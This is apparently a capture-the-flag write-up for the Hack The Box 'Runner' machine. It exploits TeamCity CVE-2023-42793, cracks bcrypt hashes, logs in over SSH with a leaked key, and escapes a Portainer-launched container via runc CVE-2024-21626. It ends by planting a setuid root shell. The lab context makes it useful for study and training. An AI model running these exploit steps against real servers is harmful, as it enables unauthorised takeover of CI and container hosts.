Runner
Recon
HTTP (80)
Port 80 seems to be server hosting services:
Directory/subdomain enumeration came empty handed. The common CI/CD pipeline software we have seen if TeamCity which isn't included in wordlists so I tried it manually:
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Runner]
└─$ curl runner.htb -H 'Host: teamcity.runner.htb' -i
HTTP/1.1 401
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 27 May 2024 14:09:42 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
TeamCity-Node-Id: MAIN_SERVER
WWW-Authenticate: Basic realm="TeamCity"
WWW-Authenticate: Bearer realm="TeamCity"
Cache-Control: no-store
Authentication required
To login manually go to "/login.html" pageTeamCity
We need credentials for login...
Under login we see version number and quick google leads us to CVE: https://github.com/Zyad-Elsayed/CVE-2023-42793
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Runner]
└─$ py CVE-2023-42793/CVE-2023-42793.py -u http://teamcity.runner.htb
[+] http://teamcity.runner.htb/login.html [H454NSec1037:@H454NSec]
There are no Agents that can do pipelines for us so there's no point in creating project and trying to setup pipeline for RCE.
Let's get backup for config files or interesting files:
Hashes found?
➜ cat .\hashes
$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye
$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em
➜ .\hashcat.exe --show .\hashes
The following 4 hash-modes match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
25600 | bcrypt(md5($pass)) / bcryptmd5 | Forums, CMS, E-Commerce
25800 | bcrypt(sha1($pass)) / bcryptsha1 | Forums, CMS, E-Commerce
28400 | bcrypt(sha512($pass)) / bcryptsha512 | Forums, CMS, E-Commerce
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=rockyou.txt --format=bcrypt .\hashes
...
$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em:piper123Looks like we also have id_rsa key:
SSH (22)
[[Labs/HackTheBox/Seasonal/Season 5/Runner/id_rsa|id_rsa]]
Verify owner:
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Runner]
└─$ ssh-keygen -l -f id_rsa
3072 SHA256:YBrlVeYeOPwQhNizkxaVtrtBTlLZ2/T5XBekbmDbEL4 john@runner (RSA)
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Runner]
└─$ ssh john@runner.htb -i id_rsaNo password.. hmm... It's still a good idea to know it.
User.txt
john@runner:~$ cat user.txt
06994b1d5849190310fc4e41f9b6a034Privilege Escalation
We only managed to get mattew's password, but where can we use it? su doesn't work.
john@runner:~$ ss -tlpn4
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:8111 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:9443 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:5005 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:9000 0.0.0.0:*
LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*We have few applications running, we know 8111 is TeamCity, but what are others?
Portainer is running on 9000 and 9433 is probably HTTPs version of it. 5005 seems unresponsive to http and netcat shows nothing.
john@runner:/data$ find / -name '*portainer*' -ls 2>/dev/null
1042 0 lrwxrwxrwx 1 root root 32 May 27 13:50 /run/systemd/units/invocation:portainer.service -> e4d709e3c81d4bd489261b0b325c9f25
61374 0 lrwxrwxrwx 1 root root 37 Feb 28 07:57 /etc/systemd/system/multi-user.target.wants/portainer.service -> /etc/systemd/system/portainer.service
61382 4 -rw-r--r-- 1 root root 276 Feb 28 20:25 /etc/systemd/system/portainer.service
61576 0 lrwxrwxrwx 1 root root 36 Feb 28 20:31 /etc/nginx/sites-enabled/portainer -> /etc/nginx/sites-available/portainer
62184 4 -rw-r--r-- 1 root root 352 Feb 28 22:24 /etc/nginx/sites-available/portainer
393229 88 -rw------- 1 root root 131072 May 27 14:55 /data/portainer.db
393232 4 -rw------- 1 root root 227 Feb 28 07:51 /data/portainer.key
393233 4 -rw------- 1 root root 190 Feb 28 07:51 /data/portainer.pub
1039 4 drwxr-xr-x 4 root docker 4096 Apr 4 10:24 /opt/portainer
1579 49924 -rwxr-xr-x 1 root docker 51122176 Dec 7 08:15 /opt/portainer/portainer
3094 0 drwxr-xr-x 2 root root 0 May 27 13:50 /sys/fs/cgroup/system.slice/portainer.service
john@runner:/data$ cd /opt/portainer/
john@runner:/opt/portainer$ ls -l
total 252236
-rwxr-xr-x 1 root docker 48047088 Dec 7 08:15 docker
-rwxr-xr-x 1 root docker 60470973 Dec 7 08:15 docker-compose
-rwxr-xr-x 1 root docker 50597888 Dec 7 08:15 helm
-rwxr-xr-x 1 root docker 48037888 Dec 7 08:15 kubectl
drwxr-xr-x 2 root docker 4096 Apr 4 10:24 mustache-templates
-rwxr-xr-x 1 root docker 51122176 Dec 7 08:15 portainer
drwxr-xr-x 3 root docker 4096 Apr 4 10:24 public
john@runner:/opt/portainer$ ls public/
060b2710bdbbe3dfe48b.svg 51906a7e4bd0e1d9e771.png 9d07a3ace464cfd6e27c.png main.712d6f30396f42406a3d.js runtime.942fa683274b3d3c26cf.js vendor.c6c227160a59d929ec43.js
112a479c093f4729251d.png 63a301f0574f1a696ce6.png c2c179f41199d25e0055.png main.712d6f30396f42406a3d.js.LICENSE.txt runtime.942fa683274b3d3c26cf.js.map vendor.c6c227160a59d929ec43.js.LICENSE.txt
19c2b168a8d85994e14e.png 63c1259abd88a9d2cebc.svg d3a18c5002453f58c8b9.png main.712d6f30396f42406a3d.js.map timeout.html vendor.c6c227160a59d929ec43.js.map
2b3c7053dcd54989a6f5.png 6d50eaeb9f128c130ed9.xml index.html main.7d6053e1c574421c1788.css vendor.b4533442c1cbb18b98a1.css
2dcfc527d067d4ae3424.png 7e697c5bab4f819328df.svg locales main.7d6053e1c574421c1788.css.map vendor.b4533442c1cbb18b98a1.css.mapIt seems we have a build version and probably only way to interact with it is to port forward it.
└─$ ssh john@runner.htb -i id_rsa -L 9000:127.0.0.1:9000
Using credentials matthew:piper123 we are able to login.
-> Googling docker escape cve
-> https://medium.com/@sk3pper/play-with-cve-2024-21626-2b4377e9577f
-> https://github.com/NitroCao/CVE-2024-21626
primary page:
Available images:
Create new container:
It kept complaining about /proc/self/fd/8 for about 300 millisecond and shut down right away.
It worked with /proc/self/fd/7, but after some time 8 also worked? I guess build step failed or something on previous:
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@67ab15dc91e3:.# ls /root
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@67ab15dc91e3:.# ls ../../../../../../../../../root
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
docker_clean.sh initial_state.txt monitor.sh root.txt
root@67ab15dc91e3:.# cd ../../../../../../../../../root
chdir: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@67ab15dc91e3:../../../../../../../../../root# ls
docker_clean.sh initial_state.txt monitor.sh root.txt
root@67ab15dc91e3:../../../../../../../../../root# cat root.txt
3d236479467eb9441598807fe1965163
root@67ab15dc91e3:../../../../../../../../../root# cp /bin/sh ../tmp/rootsh && chmod 4777 ../tmp/rootsh Writeup referenced:https://blog.taipanbyte.ru/hackthebox/Runner-HTB-Writeup
Last updated